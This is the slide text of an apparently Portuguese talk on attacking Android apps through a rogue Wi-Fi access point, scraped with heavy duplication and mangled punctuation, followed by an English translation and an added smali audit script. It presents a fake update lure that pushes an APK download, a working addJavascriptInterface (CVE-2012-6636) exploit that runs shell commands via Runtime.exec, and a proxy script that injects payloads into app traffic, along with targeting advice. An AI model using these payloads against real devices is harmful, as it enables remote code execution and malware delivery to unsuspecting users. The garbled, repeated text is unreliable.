ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problems in the javascript → java bridge
– addJavascriptInterface( )
<script>
  function execute(args) {
    return window.Attack.getClass().forName("java.lang.Runtime")
      .getMethod("getRuntime", null).invoke(null, null).exec(args);
  }
</script></head><body>
<script>
  execute(["/system/bin/sh", "-c", "echo -n JOKER > /data/data/test.webview/pwnd.txt"]);
</script>
WebSettings webSettings = browser.getSettings();
webSettings.setJavaScriptEnabled(true);
browser.addJavascriptInterface(new JsInvokeClass(), "Attack");
Payload 2
Android > 4.2
– requires @JavascriptInterface, per method
Statistics
googleplay-api
– script to download the 100 most popular free apps of every category
2379 apps downloaded; 922 have addJavascriptInterface; 339 (14%) have no @JavascriptInterface annotation
Payload 2
.class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;
.super Landroid/app/Activity;
...
const-string v7, "Android"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
...
const-string v7, "HTMLOUT"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
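An audit helper added here, not from the talk or its scripts, for the check behind the 922 / 339 figures above: it reads apktool smali, finds each WebView.addJavascriptInterface call site together with the JS name it exposes, and lists the bridge class's public methods that lack the @JavascriptInterface annotation. The smali input is constructed and the class names are invented.

```python
import re

# Constructed apktool-style smali modelled on the Caixa excerpt above; class names are made up.
# The activity registers two bridge objects, but only one bridge class carries the annotation.
SMALI_ACTIVITY = """\
.class public Lbr/example/app/ExampleWebViewActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    new-instance v6, Lbr/example/app/AnnotatedBridge;
    const-string v7, "Android"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    new-instance v6, Lbr/example/app/LegacyBridge;
    const-string v7, "HTMLOUT"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
.end method
"""
ANNOTATED_BRIDGE = """\
.method public constructor <init>()V
.end method
.method public getVersion()Ljava/lang/String;
    .annotation runtime Landroid/webkit/JavascriptInterface;
    .end annotation
    return-object v0
.end method
"""
LEGACY_BRIDGE = """\
.method public showHTML(Ljava/lang/String;)V
    return-void
.end method
.method private helper()V
    return-void
.end method
"""

CALL_RE = re.compile(r'invoke-virtual\s*\{(?P<regs>[^}]*)\},\s*Landroid/webkit/WebView;'
                     r'->addJavascriptInterface\(Ljava/lang/Object;Ljava/lang/String;\)V')
CONST_STR_RE = re.compile(r'const-string\s+(?P<reg>[vp]\d+),\s*"(?P<val>[^"]*)"')
NEW_INST_RE = re.compile(r'new-instance\s+(?P<reg>[vp]\d+),\s*(?P<cls>L[^;]+;)')
ANNOTATION = '.annotation runtime Landroid/webkit/JavascriptInterface;'

def find_bridges(activity_smali):
    # (JS name, bridge class) per call site; the {this, object, name} registers are resolved
    # from the latest const-string / new-instance seen above the call.
    last_str, last_obj, found = {}, {}, []
    for line in activity_smali.splitlines():
        line = line.strip()
        if m := CONST_STR_RE.match(line):
            last_str[m['reg']] = m['val']
        elif m := NEW_INST_RE.match(line):
            last_obj[m['reg']] = m['cls']
        elif m := CALL_RE.match(line):
            regs = [r.strip() for r in m['regs'].split(',')]
            found.append((last_str.get(regs[2], '?'), last_obj.get(regs[1], '?')))
    return found

def unannotated_public_methods(class_smali):
    # Public non-constructor methods without @JavascriptInterface: callable from JS below
    # API 17 regardless, and what the 339-app figure above counts.
    missing, current, annotated = [], None, False
    for line in class_smali.splitlines():
        line = line.strip()
        if line.startswith('.method'):
            parts = line.split()
            name = parts[-1].split('(')[0]
            current = name if 'public' in parts and name != '<init>' else None
            annotated = False
        elif line == ANNOTATION:
            annotated = True
        elif line == '.end method' and current and not annotated:
            missing.append(current)
    return missing
```

Run find_bridges over each activity's smali and unannotated_public_methods over each bridge class it names; a non-empty result for an app that still ships to pre-4.2 devices is the exposure the talk describes.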
Payload 3
Link changer
# Python 2 mitmproxy script; scanForHtmlTag() and payload are defined elsewhere in the script
def processJson(data):
    if type(data) is list:
        for m in data:
            processJson(m)
    elif type(data) is dict:
        for key in data:
            if isinstance(data[key], unicode):
                if scanForHtmlTag(data[key]):
                    data[key] = data[key] + payload
                elif "http" in data[key]:
                    data[key] = "http://www.joker.com.br"
            else:
                processJson(data[key])
Practicality
You need to
– be near the target (wifi range)
– be lucky enough to catch one of its probes, or have it like your AP
– have a DB of vulnerable apps and scan the requests looking for one
– or
– be dedicated and do recon on the target beforehand, go to the lab and come back with the apps that are vulnerable
– catch the moment of the request
Questions?
THANKS FOR WATCHING